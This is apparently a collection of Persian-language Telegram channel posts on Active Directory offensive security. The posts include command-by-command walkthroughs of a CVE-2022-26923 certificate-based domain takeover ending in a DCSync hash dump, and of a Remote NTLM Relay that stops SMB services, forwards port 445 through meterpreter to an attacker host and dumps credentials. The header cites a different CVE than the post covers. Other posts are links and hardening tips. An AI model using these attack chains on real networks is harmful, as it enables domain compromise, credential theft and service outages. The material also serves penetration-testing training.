CVE-2021-42287
Weaponisation - Active Directory

https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html

#AD
#cve
@NetPentester

Active Directory Domain Services Elevation of Privilege Vulnerability (CVE-2022-26923)🖼️

اجازه دهید به طور خلاصه در مورد یک آسیب پذیری جالب صحبت کنیم که به ما امکان می دهد دسترسی ها را در یک دامنه افزایش دهیم.
الزامات:
1. حساب دامنه.
2. امکان افزودن کامپیوتر به دامنه.
3. در دسترس بودن یک الگوی استاندارد گواهی ماشین.
4. امکان تغییر ویژگی های یک حساب کامپیوتر (به طور پیش فرض پس از افزودن کامپیوتر به دامنه خواهد بود، زیرا ما مالک شی خواهیم بود).

🐍 برای عملیات ما از ابزار Certipy استفاده می کنیم؛ اطلاعات مختصری در مورد آن در زیر ارائه شده است:

# نصب و راه اندازی
pip install certipy-ad

# درخواست گواهی
# برای certipy-ad نسخه 3.0.0:
گواهی
certipy req 'domain.local/username:[email protected]' -ca 'CA NAME' -template TemplateName
# برای certipy-ad نسخه 4.8.2:
certipy req -u [email protected] -p password -ca 'CA NAME' -template User -upn [email protected] -dc-ip 10.10.10.10

# مجوز با گواهی برای بازیابی هش NTLM:
certipy auth -pfx username.pfx -dc-ip 10.10.10.10

بیایید حمله را با افزودن یک کامپیوتر به دامنه با استفاده از Impacket-Addcomputer شروع کنیم

addcomputer.py 'domain.local/username:password' -method LDAPS -computer-name 'TESTPC' -computer-pass 'P@ssw0rd'

ما یک گواهی برای حساب کامپیوتر (الگوی ماشین) درخواست می کنیم و با آن وارد می شویم:

certipy req 'domain.local/TESTPC$:P@[email protected]' -ca 'CA NAME' -template Machine

certipy auth -pfx testpc.pfx

بعد، به هر میزبان دامنه بروید و شروع به تغییر SPN ورودی رایانه خود کنید:

Get-ADComputer TESTPC -properties dnshostname,serviceprincipalname
Set-ADComputer TESTPC -DnsHostName DC.domain.local # به دلیل یک SPN تکراری خطایی را برمی‌گرداند
Set-ADComputer TESTPC -ServicePrincipalName @{} # reset SPN
Set-ADComputer TESTPC -DnsHostName DC.domain.local

ما به میزبان مهاجم برمی گردیم و یک گواهی جدید درخواست می کنیم:

certipy req 'domain.local/TESTPC$:P@[email protected]' -ca 'CA NAME' -template Machine

ما با گواهی دریافت شده وارد می شویم و هش NTLM حساب کنترل کننده دامنه را دریافت می کنیم:

certipy auth -pfx dc.pfx
...
[*] Got NT hash for 'dc$@domain.local': 14fc9b5814def64289bb694f6659c733

در مرحله بعد، ما یک حمله DCSync را به هر شکلی که برای ما مناسب باشد انجام می دهیم و دامنه را تصرف می کنیم:

secretsdump.py 'domain.local/dc$@domain.local' -hashes aad3b435b51404eeaad3b435b51404ee:14fc9b5814def64289bb694f6659c733 -outputfile dcsync.txt

این وکتور فقط در یک محیط اکتیو دایرکتوری آسیب پذیر به CVE-2022-26923 کار می کند، اما اگر خود را در یکی بیابید، افزایش دسترسی ها به آسانی، به عنوان مثال، در مورد سوء استفاده از ZeroLogon خواهد بود!🔺

#AD
@TryHackBox

یکی از دوستان یک مخزن خوب در مورد poviting ارسال کرد. به شما می گوید که چگونه nmap را با زنجیره های پراکسی اجرا کنید (ویژگی تونل sox این است که ترافیک udp و icmp از آن عبور نمی کند)، در مورد ارسال پورت، تونل ها
https://github.com/t3l3machus/pentest-pivoting?tab=readme-ov-file

#ad #activedirectory
@TryHackBox

🔖 Cyberdefense Active Directory Mindmap v2025.03

یک برگه تقلب فوق‌العاده دقیق برای بررسی زیرساخت‌های AD .

➡️ SVG
➡️ PNG

⛺️ Home

#AD
@TryHackBox

✏️ مقاله تالیف شده
Top 10 Most Dangerous Active Directory Attack Methods

📚برخی از سرفصل ها

📗بخش اول: Active Directory (AD)

📕بخش دوم: توضیح ۱۰ مورد از خطرناک‌ترین روش حمله به Active Directory
به همراه معرفی ابزار های هر مورد

📘بخش سوم : راهبردهای جامع برای افزایش امنیت Active Directory

🔖بخش چهارم : ساخت یک دفاع مقاوم در برابر حملات Active Directory


✍️نویسنده
@TryHackBox | The Chaos

#AD #Acrive_Directory #Cybersecurity

ابزار ADKAVEH: شبیه‌سازی حملات و شناسایی در Active Directory با PowerShell

ADKAVEH یک اسکریپت PowerShell است که به تیم‌های امنیتی امکان شبیه‌سازی حملات و شناسایی در محیط‌های Active Directory را می‌دهد. این ابزار شامل ماژول‌هایی برای شبیه‌سازی حملاتی مانند Kerberoasting، AS-REP Roasting، Password Spraying و تست‌ های اختیاری برای غیرفعال‌سازی Windows Defender است.

https://github.com/TryHackBox/ADKAVEH

#tools #AD #RedTeam
@KavehOffSec
@TryHackBox

🔖 اصل قضیه: Remote NTLM Relay

⭕ امروز می‌ خوام یک وکتور دیگه از NTLM Relay رو بررسی کنم. این وکتور به‌ خاطر ویژگی‌ های exploiting زیاد استفاده نشده، ولی دونستنش مفیده.

اینجا حرف از Remote NTLM Relay هست: حمله‌ای که با متوقف‌سازی اجباری سرویس‌ های SMB روی سرور و راه‌اندازی مجدد اون‌ ها کار میکنه، به‌طوری که ترافیک واردشون روی پورت 445 پس از ری‌ استارت به ماشین مهاجم هدایت بشه. به این ترتیب مهاجم میتونه سشن‌ های ورودی رو به هر جایی که می‌خواد رله کنه.

برای exploiting باید چند مرحله ساده رو انجام بدیم.

💢 مرحله 1 > آماده‌ سازی سرور

برای آماده‌ سازی سرور جهت exploiting، باید سرویس‌ های SMB رو غیرفعال و سرور رو ری‌ استارت کنیم. مراحل به‌ صورت کلی اینه:

1. غیرفعال‌سازی NetLogon:

   sc stop netlogon

2. غیرفعال و متوقف‌کردن SMB Server (LanManServer):

   sc stop lanmanserver
   sc config lanmanserver start= disabled

3. توقف کامل LanManWorkstation:

   sc stop lanmanworkstation
   sc config lanmanworkstation start= disabled

این مراحل توی اسکرین‌ شات اول قابل مشاهده‌ست.
بعد از غیرفعالسازی سرویس‌ها باید ماشین رو ری‌ استارت کنیم (shutdown /r /t 0) خیلی مهمه که دستگاه ری‌ استارت بشه نه اینکه خاموش بشه.
پس از بوت شدن مجدد و به‌دست آوردن شل روی سرور (در این سناریو من از meterpreter استفاده کردم)، می‌تونیم به مرحله بعد بریم.

💢 مرحله 2 > تنظیم ماشین مهاجم

روی ماشین مهاجم برای رله کردن NTLM از اسکریپت ntlmrelayx.py از مجموعهٔ Impacket استفاده می‌کنیم. در مثالی که من اجرا کردم، هدف سرور 10.201.126.30 بود (چون برای این هدف SMB نیازی به signing نداشت). پراکسی‌ ای که استفاده میکنیم روی پورت 1090 listening میکنه، بنابراین دستور اجرا شبیه اینه:

proxychains impacket-ntlmrelayx -t smb://10.201.126.30 -smb2support -socks -socks-port 1090

💢 مرحله 3 > TCP relay با meterpreter

با شلی که در مرحلهٔ اول گرفتیم، ترافیک ورودی به پورت 445/TCP روی سرور رو به ماشین مهاجم (که رله رو انجام می‌ده) فوروارد/ریدایرکت می‌ کنیم. مثال دستور:

portfwd add -R -L 10.51.124.39 -l 445 -p 445

اگر همه چیز رو درست انجام بدیم، باید بتونیم یک سشن بگیریم و با موفقیت اون رو رله کنیم مثل چیزی که توی اسکرین شات سوم می‌ بینید.

💢 مرحله 4 > Post-exploitation

بعد از اینکه رله موفق باشه، ntlmrelayx.py معمولاً سشن رو باز نگه میداره؛ بنابراین با ساخت یک کانفیگ سفارشی برای proxychains می‌ تونیم از ابزارهای دیگهٔ Impacket-like برای کارهای post-exploitation استفاده کنیم.
در سناریوی من، کاربری که سشنش رله شد سطح بالایی از دسترسی‌ ها روی ماشین تارگت داشت؛ بنابراین منطقیه از secretsdump.py برای استخراج اعتبارنامه‌ها و lateral movement در دامنه استفاده کنیم:

proxychains -f p4-ntlm-relay.conf impacket-secretsdump -no-pass HOLOLIVE/[email protected]

چرا این وکتور کمتر رایجه؟

دلیل اینکه این وکتور خیلی گسترده نشده، ماهیت مخرب و تخریبی اون هست:

غیرفعال‌کردن سرویس‌ های SMB روی یک سرور فعال باعث DoS و توقف سرویس میشه. در محیط‌ های واقعی این عواقب میتونن مشکلات جدی ایجاد کنن بنابراین اجرای این حمله تنها باید با مجوز صریح (explicit authorization) از مشتری/مالک شبکه انجام بشه.

@TryHackBox
#AD #NTLM #Attack

🟥 بسیاری از نفوذهای موفق به شبکه‌های ویندوزی، نه به دلیل باگ‌های نرم‌افزاری، بلکه به دلیل پیکربندی‌های ضعیف و اشتباه در سرویس Active Directory رخ می‌دهند.

🟦کلید اصلی امنیت، غیرفعال کردن پروتکل‌های قدیمی و ناامن
(مانند NTLM و LLMNR)

🟩اعمال اصل "کمترین دسترسی" یا همان "Least Privilege" در سخت افزار ها و انجام ممیزی و بازبینی منظم تنظیمات و مجوزها است.

✍️نویسنده
@TryHackBox | The Chaos

#Active_Directory #AD #Windows #CyberSecurity